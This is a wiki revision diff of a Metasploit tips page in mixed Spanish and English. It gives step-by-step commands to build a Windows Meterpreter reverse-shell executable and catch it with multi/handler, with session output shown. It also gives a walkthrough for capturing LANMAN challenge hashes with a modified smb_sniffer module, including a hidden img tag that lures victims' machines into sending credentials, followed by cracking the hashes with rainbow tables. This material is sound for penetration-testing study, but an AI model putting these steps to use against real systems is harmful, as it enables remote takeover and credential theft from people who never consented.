Diferencia entre revisiones de «Metasploit/TipsyTrucos»
Contenido eliminado Contenido añadido
mSin resumen de edición |
Sin resumen de edición |
||
Línea 26:
* Algunos payloads pueden no trabajar correctamente en cada exploit, intenta varios payloads después de que tengas flujo de ejecución.
== Usando
En algún punto durante el uso de Metasploit necesitará ejecutar un payload sin un exploit. Esto es posible con el uso del modulo multi/handler exploit.
Paso 1. Generar su payload ejecutable:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > met-reverse.exe
paso 2. Iniciar el multi/handler a la escucha:
<pre>
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
</pre>
Paso 3. Ejecutar el ejecutable e interactuar:
<pre>
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
meterpreter >
</pre>
== LM Half-Challenge ==
Originally blogged [http://grutztopia.jingojango.net/2007/04/ntlmv1-metasploit-and-you.html here] - Using the [http://www.freerainbowtables.com/index-rainbowtables-tables-halflmchall.html Free Rainbow Tables HALFLMCHALL Tables] and a modified Metasploit 2.7 smb_sniffer exploit module, obtaining and cracking LANMAN Challenges has never been easier.
'''Step 1.''' Use Metasploit 2.7 (for now) and the updated [http://grutz.jingojango.net/exploits/smb_sniffer.pm smb_sniffer.pm] exploit module. This does not work on a Windows platform.
'''Step 2.''' Unpack Msf2.7 and place smb_sniffer.pm under the exploits/ directory, replacing the older version.
'''Step 3.''' Set up your Metasploit and run it as root
<pre>
framework-2.7 $ sudo ./msfconsole
Password:
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
+ -- --=[ msfconsole v2.7 [161 exploits - 76 payloads]
msf > use smb_sniffer
msf smb_sniffer > show options
Exploit Options
===============
Exploit: Name Default Description
-------- ------- ------------ -----------------------------------------------
optional KEY �"3DUfw� The Challenge key
optional PWFILE The PWdump format log file (optional)
optional LOGFILE smbsniff.log The path for the optional log file
required LHOST 0.0.0.0 The IP address to bind the SMB service to
optional UID 0 The user ID to switch to after opening the port
required LPORT 139 The SMB server port
Target: Targetless Exploit
msf smb_sniffer > set PWFILE=/tmp/pwtest.txt
PWFILE=/tmp/pwtest.txt:
msf smb_sniffer > exploit
[*] Listener created, switching to userid 0
[*] Starting SMB Password Service
</pre>
'''Step 4.''' Have somebody connect to your server. It can be as simple as a "dir \\serverip\share" or "<img src=\\serverip\share\file.gif height=0 width=0>" tag on some HTML page. Windows will attempt to make the connection and send the logged in user credentials to your waiting server.
[[Image:Metasploit-27-smbsniffer.png]]
'''Step 5.''' Take your new pwtest.txt file and copy it over to a Cain & Able machine that has the HALFLMCHALL tables.
[[Image:Metasploit-27-smbsniff-pw.png]]
[[Image:Metasploit-27-cainadd.png]]
'''Step 6.''' Select the hash you want to crack, right click and select Cryptanalysis Attack->HALFLM Hashes + challenge->via RainbowTables, add the tables, and crack!
[[Image:Metasploit-27-cainsuccesshalflm.png]]
'''Caveats'''
* Only LANMAN hashes can be obtained this way. If the client denies LM then too bad.
* Only the first 7 characters are in the tables. You have to brute force the rest.
* The tables are 54 GB total. It will take some time to load and search.
| |||